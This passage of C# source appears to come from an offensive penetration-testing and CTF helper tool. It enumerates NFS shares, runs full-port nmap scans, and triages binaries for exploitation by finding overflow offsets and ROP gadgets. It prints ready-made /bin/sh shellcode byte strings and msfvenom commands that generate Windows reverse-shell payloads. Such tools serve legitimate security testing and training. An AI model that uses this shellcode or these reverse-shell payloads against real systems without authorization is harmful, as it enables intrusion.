            else if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("showmount", "/sbin/showmount") == true)
                {
                    List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
                    foreach (string line in showmountOutput)
                    {
                        if (line.Contains(" (everyone)"))
                        {
                            fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                            fileList += "-- " + $"mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                        }
                        else
                        {
                            fileList += "- " + line + Environment.NewLine;
                        }
                    }
                    return(fileList.Trim(Environment.NewLine.ToCharArray()));

                    //
                    // Windows
                    //

                    // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2

                    /*
                     * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
                     * ManagementObjectCollection objMOC = objMC.GetInstances();
                     * foreach (ManagementObject objMO in objMOC)
                     * {
                     *  //Console.WriteLine("Woof!");
                     *  string featureName = (string)objMO.Properties["Name"].Value;
                     *  if (!featureName.ToUpper().Contains("NFS"))
                     *  {
                     *      continue;
                     *  }
                     *  uint installState = 0;
                     *  try
                     *  {
                     *      installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
                     *  }
                     *  catch
                     *  {
                     *      Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
                     *  }
                     *
                     *  //add to my list
                     *  Console.WriteLine("Installed: " + featureName + " -> " + installState);
                     * }
                     */
                }
            }
            else
            {
                Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
            }
            return("");
        }
Beispiel #15
0
        public static string DefaultScan(string[] args, bool mustPing)
        {
            // ip[0]
            // outputfile[1]
            if (args.Length < 1)
            {
                Console.WriteLine("Usage: ip outfile");
                Environment.Exit(0);
            }
            string target   = "";
            string fileName = "";

            if (args.Length == 1)
            {
                target = args[0];
                Console.WriteLine("Outfile name (1 word, no extension)");
                fileName = Console.ReadLine();
            }
            else if (args.Length == 2)
            {
                target   = args[0];
                fileName = args[1];
            }

            if (General.GetOS() == General.OS.Windows)
            {
                List <string> nmapOutput = General.GetProcessOutput("nmap", "-V");
                if (nmapOutput.Count == 0 || !nmapOutput[0].Contains("https://nmap.org"))
                {
                    Console.WriteLine("Error - nmap is not installed");
                    Environment.Exit(0);
                }
            }
            // Check if nmap is installed
            else if (General.GetOS() == General.OS.Linux)
            {
                if (!General.IsInstalledOnLinux("nmap"))
                {
                    Console.WriteLine("Error - nmap is not installed");
                    Environment.Exit(0);
                }
            }
            else
            {
                Console.WriteLine("Error - There is no nmap detection on this OS :<");
                Environment.Exit(0);
            }

            DateTime beforeNmapDate = DateTime.Now;

            Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
            string noPing = mustPing ? "" : " -Pn ";

            if (General.GetOS() == General.OS.Linux)
            {
                General.RunProcess($"sudo", $"nmap -sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
            }
            else
            {
                General.RunProcess($"nmap", $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
            }
            DateTime afterNmapDate    = DateTime.Now;
            TimeSpan nmapScanDuration = afterNmapDate - beforeNmapDate;

            Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon");
            return(fileName);
        }
Beispiel #16
0
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            Architecture architecture = IDFile(fileName);

            if (architecture == Architecture.Linux86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                if (General.IsInstalledOnLinux("pwn"))
                {
                    General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                    List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                    foreach (string item in dmesgOutput)
                    {
                        //  segfault at 6161616c ip 000000006161616c x
                        if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                        {
                            // Console.WriteLine("-- Item: " + item);
                            string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
                            // Console.WriteLine("-- segfaultHex: " + segfaultHex);
                            string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
                            // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
                            string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
                            Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
                }
            }
            else if (architecture == Architecture.Linux64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else if (architecture == Architecture.Windows)
            {
                Console.WriteLine("File Type: Windows (Unknown Architecture)");
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        if (pwnItem.Length == 18) // x64
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else if (pwnItem.Length == 10) // x86
                        {
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else
                        {
                            Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": pop rdi; ret;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                            if (pwnItem.Length == 18)
                            {
                                // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                                pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                                // 0x16 - x64 address
                                Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                            }
                            else
                            {
                                Console.WriteLine("Not 18 - " + pwnItem.Length);
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown prr item: " + item);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        if (pwnItem.Length == 10)
                        {
                            // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": jmp esp;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": jmp esp;", "").Trim();
                            if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x")
                            {
                                // 0x080414c3 -> 080414c3
                                string jmpesp = pwnItem.Remove(0, 2);
                                // 080414c3 -> "\xc3\x14\x04\x08"
                                jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2));
                                Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
                            }
                            else
                            {
                                Console.WriteLine("Invalud length - Bug Reelix!");
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown jmp esp Item: " + item);
                        }
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
            }

            if (General.IsInstalledOnLinux("rabin2"))
            {
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false"))
                {
                    Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                    if (architecture == Architecture.Linux64) // bits ?
                    {
                        Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                    }
                    else if (architecture == Architecture.Linux86)
                    {
                        Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
                    }
                    else if (architecture == Architecture.Windows)
                    {
                        // -f c = Format (Else it just parses raw bytes instead of showing them)
                        // -b = Bad characters
                        if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32"))
                        {
                            Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
                        }
                        else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64"))
                        {
                            Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
                        }
                    }
                    else
                    {
                        // http://shell-storm.org/shellcode/
                        Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
                    }
                }
                else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true"))
                {
                    Console.WriteLine("- nx enabled - No custom shellcode for you!");
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
            }

            if (General.IsInstalledOnLinux("objdump"))
            {
                bool          hasMain       = false;
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                    if (item.Trim().EndsWith(" <main>:"))
                    {
                        hasMain = true;
                        Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" ")));
                    }
                }

                if (!hasMain)
                {
                    objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
                    foreach (string item in objdumpOutput)
                    {
                        if (item.Trim().StartsWith("start address "))
                        {
                            Console.WriteLine("- " + item);
                            break;
                        }
                    }
                }

                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }